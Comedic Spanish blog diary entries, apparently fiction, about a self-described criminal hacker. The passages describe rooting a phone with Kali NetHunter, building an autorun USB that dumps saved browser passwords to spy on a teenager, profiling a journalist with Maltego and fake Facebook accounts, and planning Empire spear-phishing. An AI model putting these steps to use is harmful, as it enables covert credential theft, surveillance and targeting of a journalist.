- Eres un puerco... - dije, mientras tiré el cabo del cigarro y le hice seña para que nos fuésemos - hay que apurarnos, tenemos que todavía de ver cuales son los avances del Becario y el Becario con esteroides.
- Esos detalles son necesarios para armar el perfil psicológico. No sabemos con quién nos estamos asociando
- Ajá
- Si, lo vi en CSI
- Ajá
- Es una loca, adinerada que tortura a la gente. Es más, tu deberías estar muerto... o tal vez te va a matar proximamente; o puede que no y tal vez te quiera secuestrar. 
- Hum... eso puede que si, pero no por lo que estas imaginando - para despejar las dudas de Lalo, puse una canción en la radio

Manejamos todo Insurgentes para llegar a la oficina. Todo el camino Lalo se pasó dándome un sermón sobre el honor, la dignidad, el orgullo y todas esas cosas que usualmente omito. Llegamos a la oficina y entregamos el coche al valet, subimos y encontramos todo a media luz. Cruzamos la puerta de acero blindada y entonces vimos al Becario y el Becario con esteroides trabajando arduamente.

Al acercarme me di cuenta que en realidad estaban viendo Netflix.

- ¿Qué tenemos muchacho?
 - No mucho joven - me respondió Lalo 2 - intentamos contactar a una empresa que se llama IntacticPhone, nos hicieron la presentación y todo, se ven pro.

- ¿Entonces necesitamos comprar eso? - pregunté
 - Ese es el problema joven, $6000 dólares cada equipo; y necesitamos diez
 - Ouuu.. eso si es un problema. Becario con esteroides; ¿cual es la opción B?
 - ¿Qué tranza boss?, veo esos triceps adelganzando y de nuevo noto la panza
 - Ouuu... he estado un poco..
 - Enamorado - interrumpió Lalo
 - Ocupado
 - Haciendo cosas que no debe con quién no debe - volvió a interrumpir Lalo
 - En pos del bien común
 - Creo que ustedes se traen algo raro - dijo Lalo 2, mientras se nos quedaba mirando muy raro
 - Sigamos... Becario con Esteroides, ¿algo que tenga que ver con la tarea?
 - Ah, pues si... creo que nuestra mejor opción es preparar nuestros propios teléfonos; que sean de bajo costo, porque los vamos a abandonar; y realizar el aseguramiento sobre la red de telefonía normal. No creo que sea la mejor idea, pero tampoco la peor.
- ¿Qué necesitamos hacer para eso?
- Bueno, estuve probando con un celular viejito que tenía, un OnePlus; lo que hice fue descargar de Kali Linux el fork de Nethunter. Es una versión de Kali pero para ARM, la encontré en https://www.kali.org/kali-linux-nethunter/ ... sólo recuerda respaldar todo, porque perdí mis packs. 
- Ouuuu... - pelé los ojos - ¡respaldos muchacho!, ¿qué más?
- Bueno pues primero hay que entrar en el modo ingeniero; para eso hay que apachurrarle el [Inicio] y [Bajar volumen] y planchas la imagen de fabrica. Al mismo tiempo descargas las SDK tools para Windows
- ¿Windows? - dije 
- Si, Android, no creo que en tú Mac funcioné
- Hum... sigue
- Bueno, pues ya que configuramos todo vamos a flashear el celular
- Este procedimiento es complejo joven - dijo Lalo 2 - yo lo aprendí en mi curso de Análisis Forense
- ¿En la UNAM? - pregunté
- No, en la Plaza de la Computación, con el greñas. Esta bien chido
- Ouuuu ok - a veces me sorprende nuestro nivel de especialización - sigue
- Pues conectas el celular, esperas a que lo detecté y te vas al folder donde descargaste el firmware. Y entonces correr el script de flash-all.bat

- Ya que quedó, lo reinicias y entonces inicias el celular como si fuese nuevo. Lo configuras y todo el asunto; y activas el modo desarrollador, desde Configuración > Acerca del dispositivo y allí donde aparece el número de compilación le picas ocho veces hasta que salga el mensaje de que eres programador
- ¿Es en serio?
- ¿Qué?
- ¿Así activas el modo de desarrollo?
- Si
- Con razón Android es tan malo, bueno... sigue
- Ya que eres desarrollador, vas a Opciones del programador > Depuración por USB -> Aceptar y ahora reinicias el celular. Cuando vaya a aprender de nuevo entras al modo ingeniero. Ya que reinicio te vas a la computadora y escribes:
> fastboot devices
> fastboot oem unlock
> flashrecovery imagen.img
- Luego vuelves al celular y entonces seleccionas Recovery Mode, seleccionas Super Su, te vas a Advance y seleccionas ADB Sidebar; y esperas. En este momento esta esperando; vas a la computadora y pones:
> adb sideload supersu....zip
- Y esperas... y esperas y esperas...

 

- Ya que terminé vas a ver que esta instalado el Super su. Ahora mueves e Nethunter directo con el .zip y lo pegas en la tarjeta. Ya cuando está en el celular reinicias en Recovery Mode y le das click en instalar. Te va a pedir las aplicaciones que quieres instalar; y aceptas.

- Luego reinicias y listo, te pide permisos y todo eso.

- Hum.... - me quedé pensando - ¿qué opina joven?
- Ahhhh pues... chance y pega - opinó Lalo
- ¿Cuanto cuesta?
- Un OnePlus medio magullado en Mercado Libre; unos $2000 o $3000
- ¿Dólares?
- Pesos
- Ok, hay que comprar los diez. ¡Becario!, tarjeta - le dije a Lalo 2
- No joven, ya pasamos por esto una vez y no me pagaste
- ¡Becario!
- ¡Joven!
- Esto es por el bien común
- Pero no es por el bien de mis finanzas
- ¡Becario!, no tienes la actitud - y a regañadientes sacó su tarjeta de crédito
- Becario con Esteroides, prepara todos los equipos una vez que lleguen
- Si boss

Este era un buen comienzo, empezaban a construirse los vectores de ataque y teníamos al fin una aliada que tenía experiencia en algo así de grande. Tal vez si podríamos cumplir la tarea.

De vuelta a casa recibí una llamada telefónica. Antes siempre temía cuando Mom me marcaba, pero creo que ahora mis temores cambiarían de orden.

- Hola
- Ven - dijo en forma más de orden que de invitación
- Pero ya me voy a mi casa
- Dije "ven" - y subió un poco el tono de la orden
- Ok, dice Waze que llegó en 30min
- Bien... suficiente para que las burbujas se formen - y colgó

Querido diario… me siento usado; tal vez Lalo tenga razón, pero no tenía opción.

Hoy vi esto y no pude evitar querer una:

Así que de vuelta pasé a comprar algo de aragonita y piedra viva para iniciar un acuario marino y tener unas almejas máximas. Al menos son mejores mascotas que Shellcode.

16 comentarios

Lunes, 29 de Marzo de 2018: Entrenamiento 101

  por , , , ,

Querido Diario…

Mientras Nemux volvía el martes al trabajo para iniciar el ataque, no debía de olvidarme de Lalo 2, quién debía de ser entrenado para que en caso de deceso, tuviésemos a alguien listo para seguir. Debido a que no tengo mucho que hacer, decidí hacerlo yo mismo.

Pero primero que nada… tenía que felicitar a una persona muy especial; queeee.. probablemente no me entiende mucho, pero prometí que le felicitaría el día de ayer.

с днем рождения, надеюсь, вчера был отличный день … и скоро вы сможете посетить Мексику

Si… uno cuando se la pasa viajando a dar tehuacanazos por el mundo termina haciendo muchos amigos.

Después de eso, entonces si, me comuniqué con el Becario.

Lalo 2 es algo así como el consen de Lalo, esa fue la razón porque lo seleccioné para que sea entrenado y que sustituya a alguno de nosotros, que es muy probable que no regresemos vivos.

No estoy muy seguro de como Lalo 2 llegó a nosotros, cuando yo regresé a la H. Organización Turbia e Ilegal, él ya estaba allí; lleno de ilusiones en la vida, y fui yo de hecho quién se las rompió y le mostró como era el mundo de cruel.

Le mandé su boleto de avión y unas horas más tarde lo fui a recoger al aeropuerto; para iniciar su entrenamiento me apoyé de Cachanillo. Cachanillo es un elemento desplegado en Mexicali… si, no soy el único aquí. Cachanillo es muy bueno, lo conocí una ocasión en unas conferencias en CETYS y no pude pasar a oportunidad de reclutarlo. Su único problema es que es demasiada buena persona, ética, moral, de esos que dan más de si… no encaja en el perfil de esta H. Organización, pero no podía dejarle pasar.

Pasé a recoger a Cachanillo de camino al aeropuerto; y esperamos la llegada de Lalo 2.

- Joven, esto es el infierno
- ¿Por?
- Esta haciendo un calor horrible
- Novato... Cachanillo, dile como ha estado el clima
- Fresco, aun no empieza el calor - respondió Cachanillo
- ¿Ves?... sube muchacho

Manejamos de regreso hacia la ciudad. Lalo 2 tenía cara de pánico durante el viaje, mientras Cachanillo tenía cara de felicidad; usualmente Cachanillo la pasa sólo, ni siquiera porque vivimos en la misma ciudad nos vemos mucho. Y ahora tenía una visita.

- Joven, ¿qué estoy haciendo aquÍ? - rompió Lalo 2 el silencio del viaje
- Hum... tomalo como un entrenamiento
- ¿Y tenía que ser aquí?, ¿dónde están los edificios?
- Hum... esto es un desierto, en los desiertos no hay edificios, hay cactus y arena; es café de allí se llama arena. Arena, Becario; Becario, arena. 
- Joven... tengo miedo
- Eso es bueno, el miedo nos ayuda a sobrevivir. Cachanillo, ¿te gusta la comida china?
- No
- ¿Cómo puedes ser de Mexicali y no gustarte la comida china?
- No sé, pero no me gusta
- ¿Qué quieren de comer?, pagan Mom
- ¡Pampas! dijeron a coro cuando íbamos por Benito Juárez

Comimos y estuvimos platicando un buen rato. Cachanillo y Lalo 2 no se veían desde Diciembre; y yo también ya tenía un buen tiempo de no ver a Cachanillo. Terminando llevé a Cachanillo a su casa y llevé a Lalo 2 a mi casa, allí lo hospedaría esta semana durante su entrenamiento.

- Bien muchacho, ahora es tiempo de que te expliqué porque estas aquí. Te voy a poner un vídeo para que entiendas cual es el "core" de negocios de la H. Empresa Turbia e Ilegal a la que pertenecemos.

- ¡Joven, me estoy asustando mucho con esto del core de negocios!
- Ouuuu... lo siento, lo siento... error de vídeo. Ya sabes... es frontera, gringos, hackean todo
- Ajá


Cuando terminó el vídeo veía en Lalo 2 la cara de motivación que estaba buscando, fue justo cuando supe que no nos habíamos equivocado en él.

- Bueno, ¿qué te pareció?
- Increíble joven, de hecho en mi diplomado he estado aprendiendo mucho de eso
- ¿En serio?, ¿Leobardo hace cosas así?... hum.. que interesante
- Si, podemos montar honeypots para detect....  - interrumpí
- No, no, no... no estas entendiendo... nosotros no somos los que defienden
- ¿No?
- Nou
- ¡Oh diablos!, somos unos criminales
- Eso mero
- Joven, ¿esto lo saben todos?
- Hum... si, en cierta forma si, pero por las dudas no le digas a nadie
- ¿Y ahora?, ¿me vas a enseñar a hackear?
- Hum... no, eso es algo complejo; eso no se aprende. En mis tiempos no había certificaciones, diplomados o cosas así. Yo lo que voy a hacer es enseñarte a profesionalizar tu criminalidad. Serás turbio e ilegal, perooo... no serás un turbio e ilegal cualquiera; en esta semana te convertiré en un verdadero criminal
- Quiero a mi mamá
- Regla #1, un criminal nunca teme
- Quiero romper la regla #1
- ¡Actitud Becario!, actitud... no tienes la actitud

Lalo 2 tardó un poco en entender cual era la importancia de nosotros y como trabajamos. Creo que en el fondo tenía la esperanza de ser un hombre de bien que hiciese cosas bien. Pero poco a poco lo fue aceptando, no se le veía muy alegre, pero creo que entendió.

- Joven, ¿en mi entrenamiento de menos me puedes explicar algo importante?
- ¿Cómo qué?
- Pues esos secretos del mundo de la seguridad
- Hum... yo no sé de eso; pero puedes preguntarle a Bytevik
- Dicen que tu sabías
- Dicen... hace mucho
- ¿Cómo se empezaste?
- Ya ni recuerdo - me recosté en el sofá para darle dramatismo - recuerdo que el IRC, aprendí mucho de amigos que hacían research conmigo en el RTM Security Team; luego aprendí mucho en foros de Europa del Este... ouuu.. esos tipos son como artistas, verdaderos hackers que desarrollan exploits de calidad, nada de  las porquerías de los gringos que hacen en Metasploit con tal de sacar el advisory y el PoC antes que todos. Esos tipos eran verdaderos hackers, aprendí de gente de Polonia, Rumania, Estonia, Rusia, Ucrania, Uzbequistan... que tiempos Becario, que buenos tiempos
- ¿Qué tenías que aprender?, por ejemplo... ¿cómo puedo hacer un malware como el que hace poco hiciste para la misión que fuiste a hacer con Joshua?
- Eso no fue un malware, sólo fue un payload; un malware no es cosa fácil, debes de aprender como funciona un sistema operativo y como interactua con cada uno de los archivos que utilizada, ¿sabes lo que es PE?
- No
- Bueno, pues el PE es el Portable Executable Format, usualmente empezabas por allí. PE es el formato de los archivos que usa Windows; esto es muy importante si algún día quieres ser un verdadero profesional y lanzar ataques de malware completamente orientado a un objetivo en particular. Mira - y me levanté para tomar un plumón - Esto de aquí es básicamente la estructura de un archivo PE de MS Windows.

- Pero no sólo eso, lo importante también viene en sus headers. Cuando haces un payload no tiene nada de esto, así que tienes que inyectarlo dentro de un archivo que si lo tenga para que se ejecuté. Si tu tratas de ejecutar un payload sin headers va a fallar. Cuando haces malware, tienes que incluir las headers, estrictamente es un archivo real.

- Dentro de estos headers, tenemos diferentes secciones; y cada una de ellas tiene una función en especifico. Por ejemplo, tenemos donde el archivo le indica al sistema operativo donde debe de empezar a cargar; el MZ lo vas a ver en todos lados, de hecho si usas un debugger como Immunity Dbg u Ollydbg vas a verlo muy común cuando arrancas el binario. También es muy importante para poder determinar si un archivo es original o falso o si fue modificado. Además tiene tamaños especificos, de esa forma cuando hacer el reversing podrás encontrar cada una de las secciones para su análisis. - terminé
- Interesante, ¿vamos a ver más de esto en la semana?
- No, en realidad no. Mañana te voy a enseñar a manejar un arma, así podrás sacarle las contraseñas a la gente de forma más rápida. 
- Diablos
- Descansa Becario... buenas noches
- Oiga joven, una última pregunta
- ¿Si?
- ¿Qué es eso?
- Ouuuu... esto es lo más genial del mundo; es un guarda plátanos

- Joven, es la cosa más inútil del mundo
- Pero está bonito. Buenas noches Becario
- Joven, otra cosa
- ¿Ahora qué?
- Su perro está arriba de mi
- Ouuu si, se llama Shellcode. Shellcode, Lalo 2, Lalo 2, Shellcode. Ella duerme en el sofá, así que... puede que piense que eres su nuevo colchón
- Ahhhhh... ¿hay forma que... - interrumpí
- No... y ni lo intentes, te puede morder
- Ok

Me fui a mi habitación y miré mis libros. The shellcoder’s hanbook, Windows Internals en todas sus ediciones, IDA Pro guide… ese muchacho quiere aprender cosas. Como me gustaba eso.

La nostalgia fue interrumpida por una llamada, era el Lalo, seguro me preguntaría por su cachorro

- Bueno
- Joven... dime que esta vivo
- Esta vivo, pero puede que ahorita este un poco babeado por mi perrita
- Ok, eso es bueno. ¿Por qué te lo llevaste?
- Por si tú o yo no volvemos
- Hum... - Lalo se quedó pensativo, él también entiende el riesgo al que nos enfrentamos en esta misión; el hecho de que ambos estemos trabajando juntos es el reflejo del riesgo, Mom nunca nos había puesto a los dos en una misma misión, eso quiere decir que esto es grave, tal vez más grave de lo que creemos. - ¿mañana empezamos?
- Si, le marcaré a Nemux para configurar el jump box, y cuando tengas las credenciales te las pasó
- Ok... buenas noches joven
- Buenas noches - y colgó

Querido Diario… en la semana rechacé algo que podría haber puesto fin a mi camino de turbidez e ilegalidad. Pero… hay cosas… personas, que son más importantes que cualquier otra cosa.

Tengo esperanzas en el Becario… tal vez tenga futuro. Y sino, es matemático… haré que hagan las predicciones en mis inversiones.

No hay comentarios

Domingo, 11 de Marzo de 2018: ¡Muchacho me tapaste el zinc!

  por , , ,

Querido Diario…

El día de ayer había sido un día altamente productivo en el que iba a dedicar toda la tarde a leer un documento; cuando alguien me distrajo de mis responsables actividades.

Obviamente me resistí.. como una hora. Y después de eso terminé tooooooda la tarde, noche, madrugada y siguiente mañana viendo Love.

Ok, no hice nada… y en la mañana estaba tranquilamente descansando cuando escuché que se azotó la puerta. Domingo, la puerta azotandose y el sonido de cumbias y salsas invadiendo la salsa. Eso sólo se podía significar una cosa. La señora Belén había ido a hacer la limpieza.

La señora Belén es mi sirvienta, inicialmente era de mi rentero pero terminó siendo mía. Y bueno, yo no ensucio mucho pero mis manos no fueron echas para agarrar escobas o lavar trastes, ¡yiuck!.

Me paré a cerrar la puerta y evitar que de pronto entrase a jalarme las cobijas. Ella tiene llave de mi casa y sabe que si la puerta de mi habitación está cerrada es porque estoy en cueros, y es mejor que haga toda la limpieza de lo demás primero y deje al final la habitación; pero en esta ocasión no le importó y me sacó a rastras de la habitación.

- ¡Muchachooooooooooo! '¡ra no'más lo que hiciste

Sabía que estaba abajo en la cocina, pero su voz se escuchaba hasta arriba como si la tuviese a un lado.

- Allí déjelo, al rato lo lavo - grité
- ¡Qué al rato ni que al rato!, párate ahorita mismo y vas a ver la tarugada que hiciste - Si, allí la tenía al lado de mi pegándome a donde cayese
- ¿Ahora que yo hice?, sea lo que sea tiene una explicación - intentaba detener los golpes mientras bajábamos las escaleras
- ¿Qué explicación?, si tapaste todo el zinc

¡Ohhh! paréntesis; para los amantes del español. Zinc en cachanillo significa lavabo.

- A ver, ¿qué explicación tiene eso?
- Ohhhh si la tiene, de hecho es muy buena. Miré el otro día estaba yo haciendo chocolates, pero no lograba hacer la mezcla correcta; entonces tuve que tirar varías mezclas y las tiré al lavabo... y de pronto ya no se empezó a ir, y fue cuando me di cuenta que verter chocolate líquido caliente a una tubería fría había sido mala idea y... pues, henos aquí, con el "zinc" tapado.

Pensé que con esa explicación era suficiente para que ella entendiese que todo había sido un accidente. Pero no… con la señora Belén, nunca se puede dialogar.

- ¿Qué estas tarado?
- Oiga... no sé como es la vida en Mexicali, en serio aquí es otro país, pero... usualmente de donde vengo, las sirvientas no le gritan al patrón

Vi la furia en sus ojos, me hice bolita, y lo hice muy rápido; y sólo alcancé a sentir el escobazo en la espalda… y luego otro, y luego otro más, y luego uno más; hasta que me resbalé; y empecé a rezar por mi vida.

- Ante ti poderoso señor de la verdad y la luz me presento; nada poseo salvo mi propio ser y mi humana naturaleza. Señor guerrero por excelencia, tus armas truncaron los sables de Dios... 
- ¿Qué estas diciendo? - la señora Belén es peor que mi mamá, creo que sólo se podría comparar con la señora Esthela
- Pues estoy rezando
- ¿Qué clase de padre nuestro es ese?
- Ya le había dicho que no soy cristiano - y esa respuesta se tradujo en otro escobazo
- Ya párele, ¿no?... ahorita lo arreglamos
- ¿Y cómo piensas arreglarlo?
- Pues... pues... quito el tubo, le pongo otro tubo; y ya... así de facíl
- ¿Y tú sabes de poner tubos?
- Hum... no, pero... ñeeee.. ¿qué puede salir mal?

Querido Diario… como decía un maestro de Química que me dio clase en UPIBI… “¿fontanero yo?, si para eso estudié?”.  Unas horas después estábamos inundados en la cocina; teníamos a un verdadero fontanero arreglando el lavabo y la señora Belén estaba tan enojada que no tenía ganas ya de pegarme.

- Oiga.. 
- ¿Qué? - me miró de una forma que sabía que cada palabra que dijese podía representar mi eventual muerte; o peor, que renuncie
- Ya hace hambre, ¿no?
- Pues si, pero yo no voy a poder ir a comer; ahorita mis hijos ya deben andar en el sobre ruedas; y yo aquí esperando a poder secar la cocina
- Yooo... yoooo.. pues usted ya se dio cuenta que esto de la fontanería no es lo mío, perooo... yo creo que va a tardar - y me miró con unos ojos aun más amenazantes - hum.. oiga.. ¿le gusta el rámen?
- Si
- Pues yo propongo que vayamos a comer, mientras el señor termina y nos relajamos un poco.. usted deja la escoba; y firmamos las pases
- Bueno

Fuimos a un sitio llamado Umai, hace poco comí allí y me gustó mucho; hacen un rámen muy bueno… que extrañamente me recordó el mole de olla de mi abuelita.

- ¿Y ahora por que estas aquí?
- ¿Cómo?
- Si, tienes rato que no te vas
- Ouuuu.... tube unas discrepancias laborales y hum... digamos que la competencia me quiere desaparecer. Así que el dueño de donde trabajo prefiere que este aquí antes de que me pase algo malo
- Hum... ¿qué estudiaste?
- ¿En la escuela?
- Si
- Ahhh no estudié aquí; también estudié en el DF, estudie Ingeniería en Sistemas Computacionales son especialidad en Sistemas
- Hum... nunca te había preguntado a que te dedicabas, pero si.. pareces como algo de computadoras
- ¿Cómo es eso?
- Pues sólo te faltan lentes para verte como ño... 
- Señora, termina esa palabra y juro que le sorrajo el plato en la cabeza
- ¿Puedes hackear un Facebook?
- Pfff.. ¿por qué la gente siempre busca eso?... no lo parece pero estudié una ingeniería en una de las mejores escuelas del mundo; ¿y quiere que hackee un Facebook?
- Huuuuy pues perdón, era un favor - y me empecé a reir

El “Huuuuuy pues perdón” es una frase que yo digo mucho, y que ahora se le ha vuelto costumbre decir.

La señora Belén tenía un problema; uno de sus hijos cree que anda hum.. consumido cosas que no debe; y está un poco asustada porque hace poco le encontró algo más “fuerte”. Así que quiere entrar a su Facebook para saber que esta haciendo su hijo.

- ¿Qué no ha escuchado de la privacidad?
- ¡Ay chamaco!, ¿a poco tu mamá no haría algo así?
- Hum... sinceramente... creo que no. A la primer sospecha me habría roto algún hueso
- Bueno, pero seguro tu no hiciste nada de eso; y ella no tenía que preocuparse
- No, pues no
- Nunca te drogaste
- Bueno... comparado con el croc, la cocaína; no... es casi un dulce
- Ni bebiste en la escuela
- Bueno... no, ósea en la vocacional asaltábamos las camiones de Corona, pero no... no me gusta la cerveza
- ¿Ves?, en cambio este pen... ashh.. es que ya no se que hacer
- Hum... - quería ayudarla, pero ¿y mis principios?, ¿y mi ética?
- Anda
- Eso está un poco mal, tal vez debería de hablar con su hijo... al viejo estilo; creo que a usted se le da
- ¿Cómo?
- Hum.. *ALGUIEN* alguna vez me dijo que en Mexicali si acostumbraba la educación a base de la chancla
- Ay no sé, anda en malos pasos... imagínate que tu hubieses mentido, robado, engañado, hecho cosas malas; ¿dónde habrías acabado ahorita?
- Ouuuuu.. en la H. Organización Turbia e Ilegal.. ¿cree que le interese ser becario?, tenemos gente en Mexicali; podría trabajar conmigo
- Déja de bromear muchacho

Si, al final terminó convenciendome. Así que acepté.

- Miré, le voy a preparar algo... usted sabrá si lo usa o no. Pero, a mi no me meta, ni me diga nada. Sólo le advierto, a veces conocer las cosas de todos puede ser no tan bueno
- Ok, ok... ¿que hay que hacer?
- Vamos al Office Depot

Pasamos a comprar una memoria USB, el limpia pisos que le gusta y una cosa, que no recuerdo cual es la palabra; pero es la palabra cachanilla para destapa caños. Era un liquido pero, ella le dijo de otra forma.

- Oye muchacho
- ¿Eu?
- Una vez vi una película que se llama El intruso, ¿lo que vas a hacer no es igual?
- Hum.. si y no, no y si.... miré, si hay gente mala; muy mala que hace cosas como en esa película. Pero yo no... yo... es difícil explicarle
- ¿Puedes hackear un carro?
- Hum... pues nunca lo he intentado; teóricamente si, pero en práctica no estoy seguro
- ¿Cómo aprendiste todo esto?, ¿en la escuela? yo estaba pensando en mandar a mi hijo a CETYS
- Hum... no aprenderá eso allí. No lo sé... es complejo; y créame no quiere su hijo aprenda esto. Le voy a explicar paso a pasito, para que me entienda lo que estoy haciendo, vea que no es nada del otro mundo, pero... entienda lo que implica. ¿Hecho?
- Hecho - e hice como que me escupía la mano y se la daba.

Pensé en el método menos feo para enseñarle; tampoco quería meterle en un problema. Así que pensé en hacerle un USB password stealer; usando Web Browser Pass View. No es nada del otro mundo, sólo una herramienta que saca el dump de las contraseñas almacenadas en el navegador. Perfecto para que la señora pueda obtener las credenciales de Facebook, Twitter, Instragram, Snapchat, Plurk… no que quiera, sin hacer algo “malo”.

Descargue la herramienta y la coloqué en la memoria USB, luego cree un bat para ejecutarla:

Después de creado el bat, hice también un autorun, para que la herramienta se ejecute con sólo meter la USB en una computadora y en ese momento sacar todos los passwords:

Y le enseñé a la señora como funcionaba:

¡Oh diablos!, esos son mis passwords de algunas cosas y les había visto la señora Belén.

En fin, después de que terminó la inundación; la señora me puso a ayudarle a secar toda la cocina; tendió mi cama y me agradeció la comida. Se llevó una USB que únicamente con conectarla podrá espiar a su hijo de en medio… si, creo que eso no es correcto pero… ella me cae bien.

- Gracias muchacho
- Hum... yo creo que... no debería. Dele un sape como las madres de antes
- Al que le voy a dar el sape es a ti si vuelves a tapar el zinc
- Nooooo, por favor - e hice como que me hacía bolita - oiga
- ¿Qué?
- ¿Cómo se va a ir?
- Pues voy a tener que pedir un Uber, porque ya no está mi hijo mayor para que venga por mi
- ¿Dónde vive?, yo la llevo
- Pues si, porque son como $100 hasta allá, esta bien caro muchacho. ¿Conoces Villa Florida?
- Hum... olvídelo, buena suerte
- Ven para acá
- Ohhhh ya voy subase
- Si tiene mala fama el fraccionamiento, pero no está feo, es sólo mala fama
- No era por eso, soy chilango... nada por aquí puede ser lo suficientemente peligroso para mi
- ¿Entonces?
- Oiga... necesito un favor a cambio
- ¿Qué?
- Usted me dijo que luego iba mucho a San Pedro porque se dedica a los banquetes, ¿no?
- Si
- Voy a comprar una casa, quiero una grande, con alberca de preferencia y aire acondicionado del que va por dentro... consígame una ¿no?
- Ay muchacho... cuando te conocí estabas bien flaco de que no tenías dinero, incluso me quedaste a deber; y ¿ahora hasta casa?, ¿en que andas metido?, no vaya a ser que tenga que usar la cosa está en ti para saber que te traes
- Huuuuy no señora; capaz que se me espanta
- Bueno, yo te aviso. Gracias por el "raite"
- Hum... cuídese, el domingo no voy a estar. Salgo de viaje y regreso pero hasta la tarde; cierra bien; y le lava su tapetito a Shellcode.

Querido Diario… ser adolescente en la era de la tecnología debe ser difícil. Pobre de su hijo, si así me pega a mi… creo que le a romper algo importante. Pero… como decía mi abuela; así se educa a la gente.

2 comentarios

Jueves, 8 de Marzo de 2018: El muchachacho del hurón diabético

  por , , ,

Querido Diario…

La mañana había empezado como cualquier mañana. El despertador sonando cada 5 minutos por una hora antes de poder abrir los ojos; y entonces lo escuché, no era la alarma del despertador, era el tema de Hank Moody que tengo configurado como tono de llamada en el celular. Era Mom.

- Bueno
- Hola, ¿cómo estas?
- Bien
- Que bueno, ¿estas ocupado?
- No, ¿qué pasa?
- Tenemos una situación
- Pensé que habías dicho que tomase unos días después de lo que me pasó - espeté
- Si, pero... te paso la información por correo. Necesito a este peón fuera del camino, ¡ya!
- Señor, si señor - dije mientras aun con los ojos dormidos y entre las cobijas, arremedaba un movimiento marcial

Con trabajos me logre recargar en la cabecera de la cama y abrir la computadora. Desde que había regresado de la última misión, todo a mi alrededor era como una película; había basura de pizza, chetos y Red Bull. Si no fuese porque no puedo beber alcohol, probablemente habría estado ebrio desde hace una semana atrás.

Como pude intenté enfocar la información, no veía nada sin lentes. Pero pude distinguir unas cuantas palabras al azar, Armando Gómez, jefe de editores, periódico La Nación, lavado de dinero, político, ex gobernador.

Demonios, si iba a necesitar los lentes, y otro Red Bull… parece que mis vacaciones se habían terminado.

Después de hacer todo un ritual para revivir me miré al espejo. Que mal me veía, había dormido casi toda la semana, pero estaba lleno de ojeras. Sólo pasé una semana en la guerra y había terminado así; no entiendo como las personas sobreviven a años en conflictos armados. Pero bueno, al parecer Mom había entendido que lo mío no son los conflictos internacionales, no soy un héroe de guerra, yo soy una mala persona, sólo soy turbio e ilegal, hago “trabajitos” para los ricos y poderosos, a cambio de vivir en Mexicali.

Leí toda la información, y pude hacer un resumen de la situación.

Armando Gómez era el jefe de editores de un periódico local en Veracruz, quién había sacado a la luz, aparentemente; algunas notas que exponían los sobre pagos realizados por parte de un político veracruzano a varias empresas fantasma. De alguna forma, el señor Gómez había sido revirado y encarcelado por difamación, cuando no pudo en el MP mostrar la información. Sin embargo, el señor Gómez siempre insistió en que él no había autorizado la publicación de esas notas, ni las había visto. En pocas palabras, el señor Gómez decía que no tenía nada que ver con las notas, que él no había hecho esa investigación y que jamás había estado relacionado.

Mi intuición turbia e ilegal me decían que el señor Gómez, en efecto; si sabía de esos movimientos turbios, y que además, conocía algo que a Mom le preocupaba. Pero, él no había publicado la información, había sido alguien más, pero ¿quién?.

- Bueno
- Hola, ¿ya leíste la información?
- Si
- Perfecto, lo quiero fuera
- Hum... no creo que haya sido él - Mom explota cuando le llevan la contrá
- ¡¡¡¡¿¿¿Qué????!!!
- Que no creo que haya sido él
- Es su periódico - dijo Mom más calmado
- Si, pero ¿qué ganó con eso?, ¿unos tehuacanazos y habitación con tres comidas incluídas y una hora de ejercicio al día en El Infierno?
- Entonces, ¿es innocente?, ¿lo mando sacar?
- No, calma... es innocente de publicar la nota, eso creo; pero... hum... creo que él sabe quién publicó la nota. Dame unos días, necesito investigar.¿Cual es mi alcance?
- El que tu definas, sea quién sea el peón, lo quiero fuera del tablero
- ¿Fuera? - pregunté, sólo para aumentar el dramatismo de la conversación
-. Fuera
- Ok, te aviso

Bien, ya tenía carta abierta y tenía el alcance que yo “definiciese”, eso en traducción de Mom quiere decir que con mi siguiente pago habrá suficiente dinero para comer carne, de la buena.

Primero que nada debía de averiguar a quién estaba ocultando el señor Gómez, intenté buscando información sobre sus redes sociales, pero lo único que encontré fue una cuenta de Twitter, que con Maltego no pude relacionar a nada, y la cuenta de Twitter de una periodista que sólo trabaja en el mismo sitio, pero eso no me decía nada. Ni siquiera era capaz  de reconocer la cara del tipo de lo borrosa que era la foto como para buscarla usando Google Images.

Lo único que hasta este momento sabía era que le gustaba la playa y estaba un poco rellenito.

Descubrí una opción medio interesante en Maltego con licencia. Hay una transformación que funciona con un nombre, así que pusé Armando Gómez, y aunque es un nombre bastante común que me arrojo más de 1000 resultados, era lo mejor que tenía, tuve que buscar uno por uno hasta encontrar la cuenta correcta, pero cuando encontré la cuenta de Facebook, más la usuario de Twitter que ya conocía que también trabaja con él; pude hacer la relación y saber cual era su cuenta de Facebook, ahora sólo me faltaba buscarlo en Facebook, y bueno… además de la playa y comer mucho, parece que al señor Gómez le gustan los perros.

Ese comentario fue suficiente para identificar al Señor Gómez, los sitios que frecuenta y sus familiares completos, los familiares de los familares; y así una lista interminable, aun cuando el señor Gómez tenía aplicadas todas las reglas de privacidad, típico de alguien relacionado a medios. Como regla general siempre se puede decir que los permisos de una aplicación se heredan de donde se hace la publicación.

Era obvio que el señor Gómez ya no me podía agregar, pero generé un perfil falso para empezar a relacionarme con personas cercanas a él. Para ello utilice mi VPN para conectarme a través de algún servidor alejado que evitase que Facebook me relacionase con el perfil falso y empecé a generar una cuenta falsa.

Primero que nada utilice una cuenta Checa de Protonmail con la cual registre una cuenta de Facebook.

Para verificar la cuenta es muy sencillo utilizar servicios de SMS gratuitos en internet que lo que hacen es exponer número de teléfono, que reciben los mensajes. Usualmente se utilizan para confirmaciones de códigos, sólo recuerda que estos van a quedar expuestos al público, no vaya a ser que de pronto alguien te hackee.

Una vez que tenía el perfil falso agregué a su esposa, hijas, primos, familiares y amigos; y esperé a que alguno me agregase. Si me llegaron a agregar a algunos; pero por más mujerzuela que me comporté, no logré obtener más información que me acercase a mi objetivo.

La idea de todo esto era enviar algo por correo electrónico o por un mensaje que me permitiese tener control de algún equipo muy cercano o el mismo al que usaba el señor Gómez, para poder tener acceso a toda su información. Para ello busqué varias opciones y la que me pareció más viable fue generar un payload utilizando Empire.

Empire es una serie de herramientas en PowerShell, que ojo… no por leer PowerShell te imagines MS Windows; en realidad es multiplataforma, pero es más sencillo de instalar en Linux. Y que permite realizar ataques automatizados de Spear Phishing.

Instalarlo es muy sencillo, basta con descargarlo y ejecutar el script de instalación que se encargará de descargar todas las dependencias.

Al igual que es muy fácil de instalar, su ejecución también es muy sencilla, a través de un menú en consola.

